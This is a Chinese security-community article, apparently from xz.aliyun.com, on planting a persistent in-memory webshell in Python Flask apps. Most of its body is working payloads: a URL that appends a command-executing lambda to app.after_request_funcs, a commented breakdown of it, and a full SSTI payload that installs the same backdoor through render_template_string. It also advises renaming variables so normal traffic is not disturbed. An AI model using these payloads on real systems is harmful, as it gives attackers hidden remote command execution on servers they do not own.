<a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192140-cf994344-0b9a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<code>self.after_request_funcs.setdefault(None, []).append(f)</code>传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象。</p>
|
|||
|
|
<p>但我们仅通过lambad无法对原始传进来的response进行修改后再返回,所以需要重新生成一个response对象,然后再返回这个response。</p>
|
|||
|
|
<p>访问对应的url为<code>http://127.0.0.1:5000/e?cmd=app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec('global CmdResp;CmdResp=make_response(os.popen(request.args.get(\'cmd\')).read())')==None else resp)</code></p>
|
|||
|
|
<p>函数的内容为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=k>lambda</span> <span class=n>resp</span><span class=p>:</span> <span class=c1>#传入参数</span>
|
|||
|
|
<span class=n>CmdResp</span> <span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'cmd'</span><span class=p>)</span> <span class=ow>and</span> <span class=c1>#如果请求参数含有cmd则返回命令执行结果</span>
|
|||
|
|
<span class=k>exec</span><span class=p>(</span><span class=s1>'</span>
|
|||
|
|
<span class=k>global</span> <span class=n>CmdResp</span><span class=p>;</span> <span class=c1>#定义一个全局变量,方便获取</span>
|
|||
|
|
<span class=n>CmdResp</span><span class=o>=</span><span class=n>make_response</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>popen</span><span class=p>(</span><span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span>\<span class=s1>'cmd</span><span class=se>\'</span><span class=s1>)).read()) #创建一个响应对象</span>
|
|||
|
|
<span class=s1>')==None #恒真</span>
|
|||
|
|
<span class=k>else</span> <span class=n>resp</span><span class=p>)</span> <span class=c1>#如果请求参数没有cmd则正常返回</span>
|
|||
|
|
<span class=c1>#这里的cmd参数名和CmdResp变量名都是可以改的,最好改成服务中不存在的变量名以免影响正常业务</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<h2 id=toc-3>ssti利用</h2>
|
|||
|
|
<p>如果存在ssti,例如</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nd>@app.route</span><span class=p>(</span><span class=s1>'/'</span><span class=p>)</span>
|
|||
|
|
<span class=k>def</span> <span class=nf>home</span><span class=p>():</span>
|
|||
|
|
<span class=n>person</span> <span class=o>=</span> <span class=s1>'guest'</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'name'</span><span class=p>):</span>
|
|||
|
|
<span class=n>person</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'name'</span><span class=p>)</span>
|
|||
|
|
<span class=n>template</span> <span class=o>=</span> <span class=s1>'<h2>Helo </span><span class=si>%s</span><span class=s1>!</h2>'</span> <span class=o>%</span> <span class=n>person</span>
|
|||
|
|
<span class=k>return</span> <span class=n>render_template_string</span><span class=p>(</span><span class=n>template</span><span class=p>)</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>考虑到没有导包的情况,完整的url为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>http</span><span class=p>:</span><span class=o>//</span><span class=mf>127.0</span><span class=o>.</span><span class=mf>0.1</span><span class=p>:</span><span class=mi>5000</span><span class=o>/</span><span class=err>?</span><span class=n>name</span><span class=o>=</span><span class=p>{{</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'__builtins__'</span><span class=p>][</span><span class=s1>'eval'</span><span class=p>](</span><span class=s2>"app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(</span><span class=se>\"</span><span class=s2>global CmdResp;CmdResp=__import__(</span><span class=se>\'</span><span class=s2>flask</span><span class=se>\'</span><span class=s2>).make_response(__import__(</span><span class=se>\'</span><span class=s2>os</span><span class=se>\'</span><span class=s2>).popen(request.args.get(</span><span class=se>\'</span><span class=s2>cmd</span><span class=se>\'</span><span class=s2>)).read())</span><span class=se>\"</span><span class=s2>)==None else resp)"</span><span class=p>,{</span><span class=s1>'request'</span><span class=p>:</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'request'</span><span class=p>],</span><span class=s1>'app'</span><span class=p>:</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'current_app'</span><span class=p>]})}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>此时会发现成功打上了一个内存马</p>
|
|||
|
|
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192303-01285bc0-0b9b-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>参考:</p>
|
|||
|
|
<p><a href=https://xz.aliyun.com/t/10933 target=_blank>Python 内存马分析</a></p>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=post-user-action style=margin-top:34px>
|
|||
|
|
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=14421>
|
|||
|
|
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right" id=follow_topic data-pk=14421>
|
|||
|
|
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right">
|
|||
|
|
<span>
|
|||
|
|
|
|||
|
|
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<div class=clearfix></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=related-section>
|
|||
|
|
<div class=related-box>
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/14420 title=【翻译】威胁狩猎:APT43组织最新多阶段攻击方式><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>【翻译】威胁狩猎:APT43组织最...</a></span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/14422 title=使用太阿(Tai-e)进行静态代码安全分析(Servlet容器篇-零)><span class=related-label>下一篇:</span>使用太阿(Tai-e)进行静态代码...</a></span>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
|
|||
|
|
<div class=modal-dialog>
|
|||
|
|
<div class=modal-content>
|
|||
|
|
<div class=modal-header>
|
|||
|
|
<h4 class=modal-title id=myModalLabel style=text-align:center>
|
|||
|
|
积分打赏
|
|||
|
|
</h4>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-body id=button-value>
|
|||
|
|
<div style=text-align:center>
|
|||
|
|
<div role=group>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
|
|||
|
|
1分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
|
|||
|
|
2分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
|
|||
|
|
5分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
<br>
|
|||
|
|
<div style=margin-top:20px>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
|
|||
|
|
8分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
|
|||
|
|
10分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
|
|||
|
|
20分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-footer id=confirm>
|
|||
|
|
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
|
|||
|
|
<button type=button class="btn btn-primary" id=reward_topic data-pk=14421>确定</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box">
|
|||
|
|
<ol class=breadcrumb>
|
|||
|
|
<li class=active>0 条回复</li>
|
|||
|
|
</ol>
|
|||
|
|
<div class="box-container post-container">
|
|||
|
|
|
|||
|
|
<ul>
|
|||
|
|
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
|
|||
|
|
</ul>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box" id=reply-box>
|
|||
|
|
|
|||
|
|
<div class="box-container clearfix">
|
|||
|
|
|
|||
|
|
<div class=reminder>
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F14421%3Fu_atoken%3D408583c98d3c33ff2f0f44cb3eb738cf%26u_asession%3D01oib2BtUMe2FXsB5mgb-5KWpfBpg0aB7kHsSD147UFUZ81UvygBm_8ivwc-Zs-Z_7dlmHJsN3PcAI060GRB4YZGyPlBJUEqctiaTooWaXr7I%26u_asig%3D05BssisGG8Ei4348apGffqEtOIzJXnEfJmfjmUSag0uv4_Mdeo4z7ZppbV1Ay2bzLQtgDAtwBJIuwodggTkYqzpCChHzr67OoSq_lrpKJaWbFzktHyor2aTvLvtD025aS8xcwzHVD6-nhy4jLXKQl-Zboaxjm0FgrL7bN1gR9Lc4Fg2QMxYs6lyXb1lFWKql569vtzFx81YCFuUHUUg160WlR6404rUEm5vP7bKjBmNdPSlrUhBeGdMwM10MY-j4ftCC9TI14p0PFW6OVnTKD1etTkd7iI1CG-hb7Kwikd4sI%26u_aref%3DE5KVdHHHshks9dYBOUXEjRSnm8E%253D&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer class=bs-docs-footer>
|
|||
|
|
<div class="container text-center">
|
|||
|
|
<div class=links>
|
|||
|
|
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
|
|||
|
|
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
|
|||
|
|
<a href=https://xz.aliyun.com/connection>联系我们</a>
|
|||
|
|
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
|
|||
|
|
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div>
|